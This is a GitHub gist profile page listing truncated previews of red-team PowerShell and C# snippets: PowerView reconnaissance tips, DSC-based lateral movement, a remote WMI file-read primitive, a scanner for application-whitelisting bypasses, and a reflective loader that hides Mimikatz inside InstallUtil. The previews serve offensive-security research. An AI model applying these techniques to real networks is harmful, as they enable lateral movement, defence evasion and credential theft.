Skip to content

Instantly share code, notes, and snippets.

View xorrior's full-sized avatar

Chris Ross xorrior

936 followers · 13 following
View GitHub Profile
@xorrior
xorrior / PowerView-3.0-tricks.ps1
Created July 5, 2018 13:45 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@xorrior
xorrior / PowerShellDSCLateralMovement.ps1
Created June 28, 2018 19:42 — forked from mattifestation/PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@xorrior
xorrior / FileReadPrimitive.ps1
Created June 28, 2018 19:41 — forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
@xorrior
xorrior / LoadMethodScanner.ps1
Created August 11, 2017 13:04 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String]
[ValidateNotNullOrEmpty()]
@xorrior
xorrior / PELoader.cs
Created July 12, 2017 01:54
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;